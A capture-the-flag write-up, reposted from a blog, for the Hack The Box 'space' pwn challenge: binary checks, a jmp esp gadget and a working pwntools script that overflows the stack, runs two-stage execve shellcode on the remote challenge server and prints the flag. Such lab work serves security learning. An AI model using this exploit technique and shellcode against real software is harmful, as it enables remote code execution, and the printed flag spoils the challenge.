Hack-The-Box-pwn-challenge[space]

Detailed walkthrough and exploit

1. Basic checks:

┌──(root💀kali)-[~/hackthebox/challenge/pwn/space]
└─# file space
space: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=90e5767272e16e26e1980cb78be61437b3d63e12, not stripped
┌──(root💀kali)-[~/hackthebox/challenge/pwn/space]
└─# checksec space
[*] '/root/hackthebox/challenge/pwn/space/space'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
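To show what the checksec output above actually reads out of the binary, here is an added example (not part of the original writeup) that parses the program headers of a 32-bit ELF and reports the two findings that matter for this challenge: the PT_GNU_STACK flags behind “NX disabled” and any PT_LOAD segment mapped RWX. The ELF image is constructed inline by the helper build_elf, which is assumed for the demo and carries headers only.

```python
import struct

# ELF constants (values from the ELF specification / elf.h)
PT_LOAD = 1
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4
EHDR = struct.Struct("<16sHHIIIIIHHHHHH")  # Elf32_Ehdr, 52 bytes
PHDR = struct.Struct("<IIIIIIII")          # Elf32_Phdr, 32 bytes

def program_headers(data):
    """Yield (p_type, p_flags) for each program header of a 32-bit LE ELF."""
    f = EHDR.unpack_from(data, 0)
    e_ident, e_phoff, e_phentsize, e_phnum = f[0], f[5], f[9], f[10]
    if e_ident[:4] != b"\x7fELF" or e_ident[4] != 1 or e_ident[5] != 1:
        raise ValueError("not a 32-bit little-endian ELF")
    for i in range(e_phnum):
        p = PHDR.unpack_from(data, e_phoff + i * e_phentsize)
        yield p[0], p[6]  # p_type, p_flags

def stack_is_executable(data):
    """True when checksec would print 'NX disabled': PT_GNU_STACK carries PF_X.
    A missing PT_GNU_STACK entry is treated as NX disabled (historical i386 default)."""
    for p_type, p_flags in program_headers(data):
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return True

def rwx_segments(data):
    """p_type of every PT_LOAD segment mapped readable, writable and executable
    (the condition behind 'Has RWX segments')."""
    rwx = PF_R | PF_W | PF_X
    return [t for t, f in program_headers(data) if t == PT_LOAD and f & rwx == rwx]

def build_elf(stack_flags, load_flags=PF_R | PF_X):
    """Constructed minimal ELF32 image (headers only, no code) for the demo."""
    ident = b"\x7fELF\x01\x01\x01" + b"\x00" * 9         # class 32, LE, version 1
    ehdr = EHDR.pack(ident, 2, 3, 1, 0x8049000, EHDR.size, 0, 0,
                     EHDR.size, PHDR.size, 2, 0, 0, 0)  # ET_EXEC, EM_386, 2 phdrs
    load = PHDR.pack(PT_LOAD, 0, 0x8048000, 0x8048000, 0x1000, 0x1000, load_flags, 0x1000)
    stack = PHDR.pack(PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 0x10)
    return ehdr + load + stack

if __name__ == "__main__":
    for flags in (PF_R | PF_W | PF_X, PF_R | PF_W):
        elf = build_elf(flags)
        print("NX %s, RWX segments: %s" % ("disabled" if stack_is_executable(elf) else "enabled", rwx_segments(elf)))
```

Point the same two functions at the real file (open("space", "rb").read()) to reproduce the checksec lines for the challenge binary.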

2. Debug binary with buffer overflow string as input:

3. Check the EIP offset:

4. Control EIP with custom bytes:

5. Check the space for the custom payload:

There are 18B before and 9B after the 4 bytes that overwrite the EIP register.

So the payload can follow the layout from this great post: https://www.abatchy.com/2017/05/jumping-to-shellcode.html

# Payload skeleton:
1. [2nd_stage_shellcode] = 18B
2. [EIP] - jump to 1st_stage_shellcode = 4B
3. [1st_stage_shellcode + jmp 2nd_stage_shellcode] = 9B

6. Find ROP gadget for EIP to start shellcode:

Basically, “jmp esp” transfers execution to the bytes that sit on the stack right after the overwritten return address,
which are the 1st_stage shellcode and its jump back to the 2nd stage.

┌──(root💀kali)-[~/hackthebox/challenge/pwn/space]
└─# ROPgadget --binary space | grep "jmp esp"
0x08049199 : add byte ptr [0x212a], al ; jmp esp
0x08049197 : add byte ptr [eax], al ; add byte ptr [0x212a], al ; jmp esp
0x08049198 : add byte ptr [eax], al ; add eax, 0x212a ; jmp esp
0x0804919d : add byte ptr [eax], al ; jmp esp
0x0804919a : add eax, 0x212a ; jmp esp
0x0804919f : jmp esp
0x0804919b : sub ah, byte ptr [ecx] ; add byte ptr [eax], al ; jmp esp
0x08049196 : test eax, 0x5000000 ; sub ah, byte ptr [ecx] ; add byte ptr [eax], al ; jmp esp

7. Shellcode writing:

┌──(root💀kali)-[~/hackthebox/challenge/pwn/space]
└─# python -c 'from pwn import *; print(disasm("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\xb0\x0b\xcd\x80"))'
0: 31 c0 xor eax, eax
2: 50 push eax
3: 68 2f 2f 73 68 push 0x68732f2f
8: 68 2f 62 69 6e push 0x6e69622f
d: 89 e3 mov ebx, esp
f: 89 c1 mov ecx, eax
11: b0 0b mov al, 0xb
13: cd 80 int 0x80

8. Shellcode customization:

EAX holds the (18B + 4B + 9B) of data provided as input during the overflow.

Without the “mov esp, eax” step, the second_stage_shellcode would break the execution flow: its pushes would land on top of the bytes still waiting to be executed, so the pushed “0x6e69622f” would be treated as code, while it should sit on the stack as the execve() argument that EBX points to. See https://security.stackexchange.com/questions/98311/problems-executing-shellcode-via-nop-sled

Then EAX and ECX are set to 0, followed by a short jump back to the first 18B on the stack. A great article explaining why the jump byte is 0xe2 is available at https://thestarman.pcministry.com/asm/2bytejumps.htm

Second, we just set up the arguments for execve().
(Check this article if you are not familiar with the CDQ instruction.)
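The 0xe2 displacement follows directly from the layout lengths above. As an added example (mine, not the original author's), this Python 3 snippet encodes and decodes the 2-byte short jump for the 18B + 4B + 9B layout, using NOP placeholders instead of the real stages and "AAAA" in place of the gadget address; it shows that the jump sits at offset 28, right after 6 bytes of stage-1 setup, and lands back at offset 0.

```python
# Layout from the writeup: [2nd stage 18B][EIP 4B][1st stage: 9B available, 8B used]
STAGE2_LEN, EIP_LEN, STAGE1_USED = 18, 4, 8
JMP_OFFSET = STAGE2_LEN + EIP_LEN + (STAGE1_USED - 2)  # the EB xx pair is the last 2 bytes

def rel8_for_jump(jmp_offset, target_offset):
    """Displacement byte for a short jump (EB xx) placed at jmp_offset that must
    land at target_offset. The CPU adds the displacement to the address of the
    *next* instruction, so the 2 bytes of the jump itself are accounted for."""
    disp = target_offset - (jmp_offset + 2)
    if not -128 <= disp <= 127:
        raise ValueError("target not reachable with a rel8 jump: %d" % disp)
    return disp & 0xFF  # two's complement in one byte, e.g. -30 -> 0xe2

def short_jump_target(buf, jmp_offset):
    """Decode the EB xx at jmp_offset and return the offset it transfers to."""
    if buf[jmp_offset] != 0xEB:
        raise ValueError("no short jump at offset %d" % jmp_offset)
    disp = buf[jmp_offset + 1]
    if disp >= 0x80:  # rel8 is a signed byte
        disp -= 0x100
    return jmp_offset + 2 + disp

def build_layout():
    """Constructed stand-in for the payload: NOPs where the two stages would be,
    'AAAA' where the saved EIP is, and only the short jump back to offset 0 is real."""
    stage2 = b"\x90" * STAGE2_LEN
    eip = b"A" * EIP_LEN
    stage1 = b"\x90" * (STAGE1_USED - 2) + bytes([0xEB, rel8_for_jump(JMP_OFFSET, 0)])
    return stage2 + eip + stage1

if __name__ == "__main__":
    buf = build_layout()
    print("jmp at offset %d, displacement 0x%02x, lands at offset %d"
          % (JMP_OFFSET, buf[JMP_OFFSET + 1], short_jump_target(buf, JMP_OFFSET)))
```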

Final shellcode:

9. Working exploit:

  • getflag.py
from pwn import *

context.log_level = "debug"
# 2nd stage (18B): push "//sh" and "/bin", then execve("/bin//sh", 0, 0) via int 0x80
second_stage_shellcode = b"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\xb0\x0b\xcd\x80"
print("[+] second_stage_shellcode:", second_stage_shellcode)
# saved EIP (4B): address of the "jmp esp" gadget found with ROPgadget
eip = p32(0x0804919f)
print("[+] eip address:", eip)
# 1st stage (8B of the 9B available): mov esp, eax ; xor eax, eax ; mov ecx, eax ; jmp -0x1e
first_stage_shellcode = b"\x89\xc4\x31\xc0\x89\xc1\xeb\xe2"
print("[+] first_stage_shellcode:", first_stage_shellcode)
payload = second_stage_shellcode + eip + first_stage_shellcode
print("[+] final shellcode payload:", payload)

p = remote("46.101.23.188", 32417)

# send the payload once the prompt appears, then hand the shell over to the user
p.writeafter(b"> ", payload)
print("[+] sending first_stage_shellcode + second_stage_shellcode...")
p.interactive()
┌──(root💀kali)-[~/hackthebox/challenge/pwn/space]
└─# python getflag.py
('[+] second_stage_shellcode:', 'Ph//shh/bin\x89\xe3\x99\xb0\x0b\xcd\x80')
('[+] eip address:', '\x9f\x91\x04\x08')
('[+] first_stage_shellcode:', '\x89\xc41\xc0\x89\xc1\xeb\xe2')
('[+] final shellcode payload:', 'Ph//shh/bin\x89\xe3\x99\xb0\x0b\xcd\x80\x9f\x91\x04\x08\x89\xc41\xc0\x89\xc1\xeb\xe2')
[+] Opening connection to 46.101.23.188 on port 32417: Done
[DEBUG] Received 0x2 bytes:
'> '
[DEBUG] Sent 0x1e bytes:
00000000 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 99 b0 0b │Ph//│shh/│bin·│····│
00000010 cd 80 9f 91 04 08 89 c4 31 c0 89 c1 eb e2 │····│····│1···│··│
0000001e
[+] sending first_stage_shellcode + second_stage_shellcode...
[*] Switching to interactive mode
$ id
[DEBUG] Sent 0x3 bytes:
'id\n'
[DEBUG] Received 0x2a bytes:
'uid=999(ctf) gid=999(ctf) groups=999(ctf)\n'
uid=999(ctf) gid=999(ctf) groups=999(ctf)
$ whoami
[DEBUG] Sent 0x7 bytes:
'whoami\n'
[DEBUG] Received 0x4 bytes:
'ctf\n'
ctf
$ ls
[DEBUG] Sent 0x3 bytes:
'ls\n'
[DEBUG] Received 0x20 bytes:
'flag.txt\n'
'run_challenge.sh\n'
'space\n'
flag.txt
run_challenge.sh
space
$ cat flag.txt
[DEBUG] Sent 0xd bytes:
'cat flag.txt\n'
[DEBUG] Received 0x1c bytes:
'HTB{sh3llc0de_1n_7h3_5p4c3}\n'
HTB{sh3llc0de_1n_7h3_5p4c3}

Excerpted from (with credit to the original author)……

  • medium.com limits how many blog posts can be read each month and charges $5, so the article is excerpted here...
  • PWN Space challenge - HTB